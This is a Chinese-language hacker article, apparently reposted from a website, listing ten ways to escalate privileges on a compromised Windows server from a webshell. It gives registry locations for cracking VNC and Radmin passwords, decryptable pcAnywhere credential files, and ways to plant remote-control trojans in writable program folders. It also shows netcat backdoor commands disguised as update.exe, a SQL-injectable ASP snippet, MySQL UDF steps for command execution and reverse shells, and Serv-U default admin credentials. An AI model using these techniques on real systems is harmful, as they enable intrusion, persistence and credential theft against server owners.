No.10 Vnc
Vnc不少老外都在用，国内用的比较少，但是几率很大。

==============
VNC提权方法
==============
利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
69 45
150 96
177 b1
243 f3
153 99
89 59
148 94
22 16


No.9 Radmin

Radmin 是一款很不错的服务器管理无论是远程桌面控制，还是文件传输，速度都很快，很方便。
Radmin 默认端口是4899，无密码。不过服务器注重的是安全，一定会修改默认端口和密码的，端口与密码读取位置：
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置

以前我们可以用海洋木马所带的功能来读出键值,然后进行转换得到hash值,但是现在有个更方便的东西,把ASP文件传到服务器上,打开可直接读出Radmin的hash和Radmin服务端口!


No.8 PcAnywhere

PcAnywhere是一款用得很多的远程管理软件，他有一个重大漏洞是保存远程管理员帐号的CIF文件密码，是可以被轻易解密的，如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWhere 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWhere从本机登陆服务器。思路简单而明确。


Ps:保存密码的CIF文件,不是位于PCANYWhere的安装目录,而且位于安装PCANYWhere所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWhere安装在D:\program\文件下下，那么PCANYWhere的密码文件就保存在D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\文件夹下。

No.7 搜狗输入法

不少管理都使用五笔打字，不过还是有少数人喜欢用拼音，智能ABC功能少，没有全拼功能，所以大多都选择了搜狗输入法。
搜狗输入法根目录下有一个：PinyinUp.exe 是用来更新词典用的，管理员为了保存词库，有可能会把搜狗输入法安装到D盘，搜狗输入法目录默认是Everyone可读可写，直接捆绑上远控等下次重启就会上线了。

No.6 WinWebMail企业邮局系统 7i24.com

WinWebMail目录下的web必须设置everyone权限可读可写，不然邮件登陆不上去等等，所以在开始程序里找到WinWebMail快捷方式下下来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。没有删cmd组建的直接加用户。

7i24的web目录也是可写，权限为administrator。

No.5 NC反弹

nc的使用实例

c:\nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隐藏一个NetCat后门。
c:\nc.exe -p 4455 -d -L -e cmd.exe 这个命令可以让黑客利用NetCat重新返回系统，直到系统管理员在任务管理器中看见nc.exe在运行，从而发现这个后门，我们一样可以把它做的更加隐蔽，
c:\move nc.exe c:\windows\system32\Drivers\update.exe
c:\windows\systeme32\drivers\update.exe -p 4455 -d -L -e cmd.exe
系统管理员可能把特权附属于一些无害的程序，如update.exe等，黑客也可以隐藏命令行。
c:\windows\systme32\drivers\update.exe
cmd line: -l -p 4455 -d -L -e cmd.exe

c:\>
nc -l - p 80 监听80端口
nc -l -p 80 >c:\log.dat 监听80端口，并把信息记录到log.dat中
nc -v -l -p 80 监听80端口，并显示端口信息
nc -vv -l -p 80 监听80端口，显示更详细的端口信息
nc -l -p 80 -t -e cmd.exe监听本地的80端口的入站信息，同时将cmd.exe重定向到80端口，当有人连接的时候，就让cmd.exe以telnet的形式应答。当然这个最好用在控制的肉鸡上。
nc -v ip port 扫瞄某IP的某个端口
nc -v -z ip port-port扫描某IP的端口到某端口
nc -v -z -u ip port-port扫描某IP的某UDP端口到某UDP端口


No.4 mssql(sa) mysql(root)

sa 1433对外关闭的话，可以构建注入点。
<%
strSQLServerName = "服务器ip"
strSQLDBUserName = "数据库帐号"
strSQLDBPassword = "数据库密码"
strSQLDBName = "数据库名称"
Set conn = Server.createObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
rs.close


root su.php配合udf.dll提权

第一步：将PHP文件上传到目标机上，填入你的MYSQL账号经行连接。
第二步：连接成功后，导出DLL文件，导出时请勿必注意导出路径（一般情况下对任何目录可写，无需考虑权限问题），对于MYSQL5.0以上版本，你必须 将DLL导出到目标机器的系统目录(win 或 system32)，否则在下一步操作中你会看到"No paths allowed for shared library"错误。
第三步：使用SQL语句创建功能函数。语法：Create Function 函数名（函数名只能为下面列表中的其中之一） returns string soname '导出的DLL路径'；对于MYSQL5.0以上版本，语句中的DLL不允许带全路径，如果你在第二步中已将DLL导出到系统目录，那么你就可以省略路径 而使命令正常执行，否则你将会看到"Can't open shared library"错误，这时你必须将DLL重新导出到系统目录。
第四步：正确创建功能函数后，你就可以用SQL语句来使用这些功能了。语法：select 创建的函数名('参数列表')； 每个函数有不同的参数，你可以使用select 创建的函数名('help')；来获得指定函数的参数列表信息。
udf.dll功能函数说明：
cmdshell 执行cmd;
downloader 下载者,到网上下载指定文件并保存到指定目录;
open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
backshell 反弹Shell;
ProcessView 枚举系统进程;
KillProcess 终止指定进程;
regread 读注册表;
regwrite 写注册表;
shut 关机,注销,重启;
about 说明与帮助函数;


No.3 03 0day

如果支持Asp.Net组件，传Asp.Net Shell，传cmd(在Asp环境下也成功过，不过介绍上写的必须以Asp.Net运行)
使用方法:Churrasco.exe "命令"


No.2 Serv-u

漏洞是使用Serv-u本地默认管理端口，以默认管理员登陆新建域和用户来执行命令，Serv-u>3.x版本默认本地管理端口是：43958，默认管理员：LocalAdministrator，默认密码：#l@$ak#.lk;0@P，这是集成在Serv-u内部的，可以以Guest权限来进行连接，对Serv-u进行管理。

No.1 0day

文章如转载，请注明转载自：http://www.5iadmin.com/post/154.html